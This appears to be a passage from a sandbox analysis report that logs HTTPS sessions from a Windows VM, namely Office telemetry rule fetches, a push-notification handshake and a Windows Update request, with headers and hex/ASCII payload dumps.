                                                                                                                                                                                              16192.168.2.64972113.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:17 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:17 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 471
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                              x-ms-request-id: e9522a88-801e-0067-2316-3dfe30000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123917Z-178bfbc474bbbqrhhC1NYCvw74000000061g00000000b5sd
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:17 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              17192.168.2.64972313.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:17 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:17 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 467
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                              ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                              x-ms-request-id: de6003cd-b01e-0098-493c-3ccead000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123917Z-178bfbc474bbcwv4hC1NYCypys00000005ug000000006173
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:17 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              18192.168.2.64972520.198.119.143443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:18 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 62 74 30 65 6d 6d 69 38 44 6b 4b 34 6f 46 2f 6c 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 34 38 37 37 35 37 66 36 63 39 65 66 32 31 36 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: CNT 1 CON 305MS-CV: bt0emmi8DkK4oF/l.1Context: d487757f6c9ef216
                                                                                                                                                                                              2024-11-24 12:39:18 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                              2024-11-24 12:39:18 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 62 74 30 65 6d 6d 69 38 44 6b 4b 34 6f 46 2f 6c 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 34 38 37 37 35 37 66 36 63 39 65 66 32 31 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 33 67 4a 6a 56 2b 4c 6c 52 52 4f 35 34 6f 43 36 51 42 74 34 30 36 63 61 52 58 54 66 66 49 6b 43 4e 76 2b 39 4b 42 47 55 31 66 4d 62 30 6c 55 62 63 77 48 78 59 4c 76 49 49 6e 4d 78 64 6c 34 6a 6b 39 51 46 63 4c 67 35 61 4c 31 4b 45 42 6c 47 71 42 77 47 34 34 67 47 63 4a 67 55 62 37 67 44 34 65 41 69 55 52 78 69 4d 78 5a 6d
                                                                                                                                                                                              Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: bt0emmi8DkK4oF/l.2Context: d487757f6c9ef216<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZ3gJjV+LlRRO54oC6QBt406caRXTffIkCNv+9KBGU1fMb0lUbcwHxYLvIInMxdl4jk9QFcLg5aL1KEBlGqBwG44gGcJgUb7gD4eAiURxiMxZm
                                                                                                                                                                                              2024-11-24 12:39:18 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 62 74 30 65 6d 6d 69 38 44 6b 4b 34 6f 46 2f 6c 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 34 38 37 37 35 37 66 36 63 39 65 66 32 31 36 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: bt0emmi8DkK4oF/l.3Context: d487757f6c9ef216<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                              2024-11-24 12:39:19 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                              Data Ascii: 202 1 CON 58
                                                                                                                                                                                              2024-11-24 12:39:19 UTC58INData Raw: 4d 53 2d 43 56 3a 20 70 63 48 33 43 56 7a 5a 68 55 4f 53 6a 73 33 4c 69 55 6d 4e 55 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                              Data Ascii: MS-CV: pcH3CVzZhUOSjs3LiUmNUQ.0Payload parsing failed.


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              19192.168.2.6497264.175.87.197443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:19 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Sp8chA7XUbEVBFr&MD=AEems1gD HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                              Host: slscr.update.microsoft.com
                                                                                                                                                                                              2024-11-24 12:39:19 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                              Expires: -1
                                                                                                                                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                              ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                              MS-CorrelationId: 6e8a2fac-10fd-4700-b544-191f33014832
                                                                                                                                                                                              MS-RequestId: 0e87bed9-9283-473d-a68c-8bd65d360f2f
                                                                                                                                                                                              MS-CV: Tz9hg7EwSUGrmLaJ.0
                                                                                                                                                                                              X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:18 GMT
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Content-Length: 24490
                                                                                                                                                                                              2024-11-24 12:39:19 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                              Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                              2024-11-24 12:39:19 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                              Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              20192.168.2.64972913.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:19 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:19 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 486
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB344914B"
                                                                                                                                                                                              x-ms-request-id: 9bcae678-901e-007b-2946-3cac50000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123919Z-178bfbc474bv7whqhC1NYC1fg400000005wg00000000ahub
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:19 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              21192.168.2.64973113.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:19 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:19 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 486
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                              ETag: "0x8DC582B9018290B"
                                                                                                                                                                                              x-ms-request-id: ad60cd0f-c01e-008e-6f6a-3c7381000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123919Z-174c587ffdf4zw2thC1TEBu34000000004n0000000000cb7
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:19 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              22192.168.2.64973013.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:19 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:19 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 427
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                              ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                              x-ms-request-id: f440515e-401e-0029-2e38-3c9b43000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123919Z-178bfbc474bv587zhC1NYCny5w00000005tg0000000093f0
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:19 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              23192.168.2.64972813.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:19 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:19 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 407
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                              ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                              x-ms-request-id: 5235ff2f-501e-008f-1c4e-3c9054000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123919Z-178bfbc474b9xljthC1NYCtw9400000005xg000000004s1d
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:19 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              24192.168.2.64973213.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:19 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:19 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 407
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
